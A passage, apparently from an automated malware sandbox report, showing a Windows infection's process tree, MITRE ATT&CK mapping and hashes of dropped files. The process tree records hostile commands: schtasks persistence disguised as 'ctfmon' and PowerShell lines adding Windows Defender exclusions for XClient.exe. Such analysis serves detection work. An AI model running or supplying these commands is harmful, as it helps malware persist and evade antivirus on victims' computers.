        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        15⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2824
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        16⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:700
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\DVN4RLsSRPkt.bat" "
        16⤵
        
        PID:2936
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        17⤵
        
        PID:2584
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        17⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2560
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        17⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1624
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        18⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2988
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\iOPZcxU38VKt.bat" "
        18⤵
        
        PID:2096
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        19⤵
        
        PID:3976
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        19⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:444
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        19⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1880
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        20⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4032
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\aPkGP2gyB4P0.bat" "
        20⤵
        
        PID:2660
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        21⤵
        
        PID:3136
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        21⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:848
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        21⤵
        
        PID:3872
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        22⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2460
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\I32bBAkzON36.bat" "
        22⤵
        
        PID:848
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        23⤵
        
        PID:2676
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        23⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3096
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        23⤵
        
        PID:4276
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        24⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4704
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\qXLo5jz87cEa.bat" "
        24⤵
        
        PID:4812
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        25⤵
        
        PID:4840
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        25⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4848
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        25⤵
        
        PID:1700
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        26⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4312
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\MURNBVrXIROx.bat" "
        26⤵
        
        PID:4992
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        27⤵
        
        PID:4792
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        27⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4740
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        27⤵
        
        PID:5064
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        28⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4312
  - - C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2356
  - - C:\Users\Admin\AppData\Local\Temp\Files\Discord.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\Discord.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3620
  - - C:\Users\Admin\AppData\Local\Temp\Files\qNVQKFyM.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\qNVQKFyM.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:3304
  - - C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
      4⤵
      Drops startup file
      PID:444
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3784
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4164
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4416
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4288
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4220

C:\Windows\system32\taskeng.exe
taskeng.exe {5E86707E-0FC1-4396-8139-DD2010985832} S-1-5-21-312935884-697965778-3955649944-1000:MXQFNXLT\Admin:Interactive:[1]
1⤵
PID:5000
- C:\Users\Admin\AppData\Roaming\XClient.exe
  C:\Users\Admin\AppData\Roaming\XClient.exe
  2⤵
  PID:4152

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Synaptics\Synaptics.exe

Filesize
764KB

MD5
85e3d4ac5a6ef32fb93764c090ef32b7

SHA1
adedb0aab26d15cf96f66fda8b4cfbbdcc15ef52

SHA256
4e5cc8cb98584335400d00f0a0803c3e0202761f3fbe50bcab3858a80df255e1

SHA512
a7a037bde41bcd425be18a712e27a793185f7fde638e139bbd9d253c371cd9622385eda39cf91ab715ead2591cff5b8c9f5b31d903f138d8af7bab6a9001ccab

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F59A01A8B782D93EA6991BC172CEFFB1

Filesize
867B

MD5
c5dfb849ca051355ee2dba1ac33eb028

SHA1
d69b561148f01c77c54578c10926df5b856976ad

SHA256
cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b

SHA512
88289cdd2c2dd1f5f4c13ab2cf9bc601fc634b5945309bedf9fc5b96bf21697b4cd6da2f383497825e02272816befbac4f44955282ffbbd4dd0ddc52281082da

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b77d78f89fe0c768eda97b753d913dde

SHA1
2f8330fcbee2620aad6c52efd1f50d7b1d0e1b76

SHA256
324c228c4c486a3b759bc2b6164a464b74935f404509725e0615f2a71b9871e3

SHA512
ad45014cef566e34ba178c351ac57dbc0da67ab2c021761643a314ca8bba3aefe2cd72607dabf75cfafffd9a2b849d6a2327adb9d7a84c49ac68d9fa0575daa5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
eb2e4d8e2a03bd101fa4112fe4ac0e82

SHA1
e86c6faf1e37778060a61778ac6f743d386b5ed5

SHA256
6d9dd490861a7f3cf95986e5e1dd9aedaf452b8cf63cea399f78db09fe9e0065

SHA512
745414d55e26309ac7780c677476d132c074db6674fd799dc189ca9a0f846453ae27d7e577e7a31e54326936fa855f8b8d9c04933e7e18f07a239bee0ad6eb09

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
2d6aa269f93ab0f810f6dbbb03b5e8a4

SHA1
d37bd2646fe2115dbd552eb833068b937c47c31f

SHA256
b7f9fe3ad92f43002db60c3836f7edde12139998a6a4393f263892dd00a6a4b7

SHA512
2b61eb8b1d7d8f8419f1d69a5d0d5ffbcb0c2ba231283685f28d84aa615a7fb428abdf318556cd68722438ac3ace7f24026bc3a105f9ba8626c4e1ba09937127

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1ce5399e842e62d5695c4f7f343c24c4

SHA1
fea391cebff0e1e35143f6f88d1b7001742148b0

SHA256
1cf0e064f5f1f421cb10ea42206cedf646835b0b38bac38add361c818d7b7534

SHA512
881501a04f49506a543baab7413bb2e4093f1215b3863ccd48ec6e04d3b0bdf0736bf4fa8b1d6111f34b64e6a1ccbc40b3279c4fb8acf08fa2c68932eda61bd9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c7599c567cd8e113849282c85667215a

SHA1
8bcf4d7b8ee692b30b5cd3d83eb9d98ee8e2b5c9

SHA256
399f5ee0360d3c6e85481c969f2bf8f6c7bd2f164b65944b952be1153e2c18fe

SHA512
1e7fb719a5a919bdbafe9b82e960c432e44ebb313d28408552fcd4788a54e56f525810b67e1e54e229d643b0faaa96bc824c3714c5802c80f95fa39576f29581

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F59A01A8B782D93EA6991BC172CEFFB1

Filesize
242B

MD5
c8058d69de5c193b5de3db847146fedb

SHA1
24c05acbbea37d8ee0256069da3c1ce8efdef3a4

SHA256
da5735135a506fd8362c261c8bc41bf502c3c9536990e6c7c3895b1c30325222

SHA512
fcdf50f18c78ff9719f7069c6b401c563cc13930b4e8db5b97479d4b76e07f90edd5e13882038fb578ceaeb2483002015f4c9eb070fe2f5f50a76e273705ff74

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabF8D0.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\DVN4RLsSRPkt.bat

Filesize
207B

MD5
0253b9a32871565d5d6a61ae49366f58

SHA1
e38023cfee82e6de4f9a5d5215b1d3024b4a6476

SHA256
802159ae9dd945c1e280fe56e0fe4741f4873ece819b2dc47afe125b0cf8582e

SHA512
0af966311804f74af33f7f9d04e7fcbe5945fc51b3fbc037653c407d2b0b856d041b7e962d40970c7007d125a20e790cf0e8182246a84be6809856d622489d74

Download Submit
C:\Users\Admin\AppData\Local\Temp\E3AB.tmp\E3AC.tmp\E3AD.bat

Filesize
1KB

MD5
b7ad290c8ed22e19d61aaeb8fd0c7bf2

SHA1
cec47e2b90320f87bb7f475f54b7d1e69ab1ad53

SHA256
78b4a6676810bf76f1111284ca945a14bb884267fb536c5865e0d62b27f32612

SHA512
4fdf72b4566372d86abce8cdbcf0048acd09edd825fa5b8ffe9688f7983f7115798424f8e25b425381593f2f08739470956fd5bcc9ef6ce3bf1765b33ef6e0fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Bugs.exe

Filesize
72KB

MD5
b699727b6caadb9c06362cd45ce8f7eb

SHA1
97e5b53e56ef7b4ee0f328a63543cae247c684cd

SHA256
00c454353111b5b127f658174aeeecf9a178bcd5b98e7917a6620e5179375fa9

SHA512
911addf37ca285bfdf0303411da233baa0ae33f6773790b10c811d01882cd1531043e36a44ab7a57fc7113638ff42c770c8a61c23c9d62e45c5876bba77eea34

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe

Filesize
348KB

MD5
beb1de229b374cd778107c8268e191ac

SHA1
fb5dcf278195472e206fa484f7005aa485c308ae

SHA256
604b99f997d7de70804667e6e985627485d1a4d1eb694f3c36a34f0a01aef7bd

SHA512
62bbd4c5688438fb5b9d3610cc2fe2be654f4373a28fc116d6118d20b00c82060ac77d33c11758ef20b84a06a3eaced8a6eb9fe792a3a21207f1b37bb18caff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Discord2.exe

Filesize
47KB

MD5
3e7ca285ef320886e388dc9097e1bf92

SHA1
c2aaa30acb4c03e041aa5cca350c0095fa6d00f0

SHA256
e9727d97d2b5f5953a05eaf69a1bdab54cc757955fbab97476d94a5af5920b97

SHA512
34266fb5685485010f076d0fec19ae538f27a9da1cccaf3454117480b7ebe83a612a52b44d651fa35897b237409cabf098ae69c9572f9932adf022f9eb894006

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\JEDITOR.INI

Filesize
69B

MD5
65557835edae901565682a5eecafec94

SHA1
4706e55b1831aecff7ad5cb3a96221dc2dacc526

SHA256
c947b14c9f2012a8dc8944d44208ee57a998dac5d64423a57381218caf975b3f

SHA512
b7f4e0445c6fe60665e1952ddcabba5fd26406bc3173e9bfa741d774dce092d70cf672101ab8621f643b86cf28c71980f4f81e4cccaadaebfc4ae314597ce57b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Utility2.exe

Filesize
321KB

MD5
4bd25a55bcb6aec078ab1d909cfabe64

SHA1
ba68ca4d2601d9c34bf3e897b434e1abc042e254

SHA256
f0c2e045cbe2076d3c85f4637c9f404407239a109c4d493165a6b55067729d60

SHA512
fac63d88926fb64e90f4863e7bbac681b9b25965384b3f2624c33639eead4930a0cd3503b8a24e6aecb815a392729b75459fa59f197048cfb1d89ce41c4c9006

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\whats-new.exe

Filesize
108KB

MD5
a774da459014620248490f5bcddb2cea

SHA1
451b5c9ccd458908f8132dc8f9f754d2c54016b0

SHA256
7748028d079b05131fa680290366c8a094d756ee1ae3fb7b9f68883b6cdea7b7

SHA512
8939387e38bc8222d705315987736f98d6b78330c75b9804aded78d3e1702ad674bd874163d830326523d4523d787b56e0221ab0855471a7a4d24fbe97232641

Download Submit
C:\Users\Admin\AppData\Local\Temp\I32bBAkzON36.bat

Filesize
207B

MD5
b298ecec76e2ca41640e1dd2c33b2d7b

SHA1
9ed1e97292ce6d681fcf6b62a40e9c97c40e8aa5

SHA256
7ff73a1e159d7b5633de01d24f11eeda02a1fad4f41b3449e1d35c04939e2836

SHA512
10a8ed3629d33e72768c07d455f5ac389a6478dde5d959f52fb92f00ba6019b73caea6dff64c0afe44dd1e9bc05b320b5051c4d21741cfd453fc3f827bb7c019

Download Submit
C:\Users\Admin\AppData\Local\Temp\MURNBVrXIROx.bat

Filesize
207B

MD5
6839918d28178fcf554bde735bc47aa4

SHA1
ae9a9f7462e3eb3636911840d564e34c3e7ab89c

SHA256
eed4cddfa84c6ee80bab18b274bed7f2352be2ec6854e8dd1e5803a408cb8403

SHA512
363f49850941cab8b15cc889612573f2e8b50da00b28f447299fc62133a8696143207b4b0a3b8390be1d2b925962407b5df3fdbb74b6834fd30c1416413116e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarF96F.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tc9VPGO7zAtb.bat

Filesize
207B

MD5
b63c2345870eb187b1058ada8a092da6

SHA1
5bdcfa25705bc328a6938cdd8ab127103ea1f342

SHA256
33539bcb6f84ba59a52814a0803e7157c33664935aefe262032f63b47ea6f465

SHA512
d86377e893fdf5784ee6781d43cbdbe4f7b16820e974dfee2c3982d1991ef0a5997df6412877bab4c2662f35016eae19288c9a2abb1f968044689f74a8e1b44a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20922\VCRUNTIME140.dll

Filesize
95KB

MD5
f34eb034aa4a9735218686590cba2e8b

SHA1
2bc20acdcb201676b77a66fa7ec6b53fa2644713

SHA256
9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1

SHA512
d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_bz2.pyd

Filesize
44KB

MD5
c24b301f99a05305ac06c35f7f50307f

SHA1
0cee6de0ea38a4c8c02bf92644db17e8faa7093b

SHA256
c665f60b1663544facf9a026f5a87c8445558d7794baff56e42e65671d5adc24

SHA512
936d16fea3569a32a9941d58263e951623f4927a853c01ee187364df95cd246b3826e7b8423ac3c265965ee8e491275e908ac9e2d63f3abc5f721add8e20f699

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_ctypes.pyd

Filesize
55KB

MD5
5c0bda19c6bc2d6d8081b16b2834134e

SHA1
41370acd9cc21165dd1d4aa064588d597a84ebbe

SHA256
5e7192c18ad73daa71efade0149fbcaf734c280a6ee346525ea5d9729036194e

SHA512
b1b45fcbb1e39cb6ba7ac5f6828ee9c54767eabeedca35a79e7ba49fd17ad20588964f28d06a2dcf8b0446e90f1db41d3fca97d1a9612f6cc5eb816bd9dcdf8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_decimal.pyd

Filesize
102KB

MD5
604154d16e9a3020b9ad3b6312f5479c

SHA1
27c874b052d5e7f4182a4ead6b0486e3d0faf4da

SHA256
3c7585e75fa1e8604d8c408f77995b30f90c54a0f2ff5021e14fa7f84e093fb6

SHA512
37ce86fd8165fc51ebe568d7ce4b5ea8c1598114558d9f74a748a07dc62a1cc5d50fe1448dde6496ea13e45631e231221c15a64cebbb18fa96e2f71c61be0db4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_hashlib.pyd

Filesize
32KB

MD5
8ba5202e2f3fb1274747aa2ae7c3f7bf

SHA1
8d7dba77a6413338ef84f0c4ddf929b727342c16

SHA256
0541a0028619ab827f961a994667f9a8f1a48c8b315f071242a69d1bd6aeab8b

SHA512
d19322a1aba0da1aa68e24315cdbb10d63a5e3021b364b14974407dc3d25cd23df4ff1875b12339fd4613e0f3da9e5a78f1a0e54ffd8360ed764af20c3ecbb49

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_lzma.pyd

Filesize
82KB

MD5
215acc93e63fb03742911f785f8de71a

SHA1
d4e3b46db5d4fcdd4f6b6874b060b32a4b676bf9

SHA256
ffdbe11c55010d33867317c0dc2d1bd69f8c07bda0ea0d3841b54d4a04328f63

SHA512
9223a33e8235c566d280a169f52c819a83c3e6fa1f4b8127dde6d4a1b7e940df824ccaf8c0000eac089091fde6ae89f0322fe62e47328f07ea92c7705ace4a72

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_queue.pyd

Filesize
22KB

MD5
7b9f914d6c0b80c891ff7d5c031598d9

SHA1
ef9015302a668d59ca9eb6ebc106d82f65d6775c

SHA256
7f80508edff0896596993bf38589da38d95bc35fb286f81df361b5bf8c682cae

SHA512
d24c2ff50649fe604b09830fd079a6ad488699bb3c44ea7acb6da3f441172793e6a38a1953524f5570572bd2cf050f5fee71362a82c33f9bb9381ac4bb412d68

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_socket.pyd

Filesize
39KB

MD5
1f7e5e111207bc4439799ebf115e09ed

SHA1
e8b643f19135c121e77774ef064c14a3a529dca3

SHA256
179ebbe9fd241f89df31d881d9f76358d82cedee1a8fb40215c630f94eb37c04

SHA512
7f8a767b3e17920acfaafd4a7ed19b22862d8df5bdf4b50e0d53dfbf32e9f2a08f5cde97acecb8abf8f10fbbedb46c1d3a0b9eb168d11766246afe9e23ada6fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_sqlite3.pyd

Filesize
47KB

MD5
e5111e0cb03c73c0252718a48c7c68e4

SHA1
39a494eefecb00793b13f269615a2afd2cdfb648

SHA256
c9d4f10e47e45a23df9eb4ebb4c4f3c5153e7977dc2b92a1f142b8ccdb0bb26b

SHA512
cc0a00c552b98b6b80ffa4cd7cd20600e0e368fb71e816f3665e19c28ba9239fb9107f7303289c8db7de5208aaef8cd2159890996c69925176e6a04b6becc9b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20922\_ssl.pyd

Filesize
59KB

MD5
a65b98bf0f0a1b3ffd65e30a83e40da0

SHA1
9545240266d5ce21c7ed7b632960008b3828f758

SHA256
44214a85d06628eb3209980c0f2b31740ab8c6eb402f804816d0dae1ec379949

SHA512
0f70c2722722eb04b0b996bbaf7129955e38425794551c4832baec8844cde9177695d4045c0872a8fb472648c62c9bd502c9240facca9fb469f5cbacbe3ca505

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20922\api-ms-win-core-console-l1-1-0.dll

Filesize
12KB

MD5
f5625259b91429bb48b24c743d045637

SHA1
51b6f321e944598aec0b3d580067ec406d460c7b

SHA256
39be1d39db5b41a1000d400d929f6858f1eb3e75a851bcbd5110fe41e8e39ae5

SHA512
de6f6790b6b9f95c1947efb1d6ea844e55d286233bea1dcafa3d457be4773acaf262f4507fa5550544b6ef7806aa33428cd95bd7e43bd4ae93a7a4f98a8fbbd6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20922\api-ms-win-core-datetime-l1-1-0.dll

Filesize
11KB

MD5
38d6b73a450e7f77b17405ca9d726c76

SHA1
1b87e5a35db0413e6894fc8c403159abb0dcef88

SHA256
429eb73cc17924f0068222c7210806daf5dc96df132c347f63dc4165a51a2c62

SHA512
91045478b3572712d247855ec91cfdf04667bd458730479d4f616a5ce0ccec7ea82a00f429fd50b23b8528bbeb7b67ab269fc5cc39337c6c1e17ba7ce1ecdfc1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20922\api-ms-win-core-debug-l1-1-0.dll

Filesize
11KB

MD5
a53bb2f07886452711c20f17aa5ae131

SHA1
2e05c242ee8b68eca7893fba5e02158fae46c2c7

SHA256
59a867dc60b9ef40da738406b7cccd1c8e4be34752f59c3f5c7a60c3c34b6bcc

SHA512
2ca8ad8e58c01f589e32ffaf43477f09a14ced00c5f5330fdf017e91b0083414f1d2fe251ee7e8dd73bc9629a72a6e2205edbfc58f314f97343708c35c4cf6c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20922\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
11KB

MD5
ab810b5ed6a091a174196d39af3eb40c

SHA1
31f175b456ab5a56a0272e984d04f3062cf05d25

SHA256
4ba34ee15d266f65420f9d91bac19db401c9edf97a2f9bde69e4ce17c201ab67

SHA512
6669764529eeefd224d53feac584fd9e2c0473a0d3a6f8990b2be49aaeee04c44a23b3ca6ba12e65a8d7f4aeb7292a551bee7ea20e5c1c6efa5ea5607384ccab

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20922\api-ms-win-core-file-l1-1-0.dll

Filesize
15KB

MD5
869c7061d625fec5859dcea23c812a0a

SHA1
670a17ebde8e819331bd8274a91021c5c76a04ba

SHA256
2087318c9edbae60d27b54dd5a5756fe5b1851332fb4dcd9efdc360dfeb08d12

SHA512
edff28467275d48b6e9baeec98679f91f7920cc1de376009447a812f69b19093f2fd8ca03cccbdc41b7f5ae7509c2cd89e34f33bc0df542d74e025e773951716

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20922\api-ms-win-core-file-l1-2-0.dll

Filesize
11KB

MD5
1f72ba20e6771fe77dd27a3007801d37

SHA1
db0eb1b03f742ca62eeebca6b839fdb51f98a14f

SHA256
0ae3ee32f44aaed5389cc36d337d57d0203224fc6808c8a331a12ec4955bb2f4

SHA512
13e802aef851b59e609bf1dbd3738273ef6021c663c33b61e353b489e7ba2e3d3e61838e6c316fbf8a325fce5d580223cf6a9e61e36cdca90f138cfd7200bb27

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20922\api-ms-win-core-file-l2-1-0.dll

Filesize
11KB

MD5
c3408e38a69dc84d104ce34abf2dfe5b

SHA1
8c01bd146cfd7895769e3862822edb838219edab

SHA256
0bf0f70bd2b599ed0d6c137ce48cf4c419d15ee171f5faeac164e3b853818453

SHA512
aa47871bc6ebf02de3fe1e1a4001870525875b4f9d4571561933ba90756c17107ddf4d00fa70a42e0ae9054c8a2a76d11f44b683d92ffd773cab6cdc388e9b99

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20922\api-ms-win-core-handle-l1-1-0.dll

Filesize
11KB

MD5
f4e6ecd99fe8b3abd7c5b3e3868d8ea2

SHA1
609ee75d61966c6e8c2830065fba09ebebd1eef3

SHA256
fbe41a27837b8be026526ad2a6a47a897dd1c9f9eba639d700f7f563656bd52b

SHA512
f0c265a9df9e623f6af47587719da169208619b4cbf01f081f938746cba6b1fd0ab6c41ee9d3a05fa9f67d11f60d7a65d3dd4d5ad3dd3a38ba869c2782b15202

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20922\api-ms-win-core-heap-l1-1-0.dll

Filesize
12KB

MD5
a0c0c0ff40c9ed12b1ecacadcb57569a

SHA1
87ed14454c1cf8272c38199d48dfa81e267bc12f

SHA256
c0f771a24e7f6eda6e65d079f7e99c57b026955657a00962bcd5ff1d43b14dd0

SHA512
122e0345177fd4ac2fe4dd6d46016815694b06c55d27d5a3b8a5cabd5235e1d5fc67e801618c26b5f4c0657037020dac84a43fcedbc5ba22f3d95b231aa4e7b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI20922\api-ms-win-core-interlocked-l1-1-0.dll

Filesize
11KB

MD5
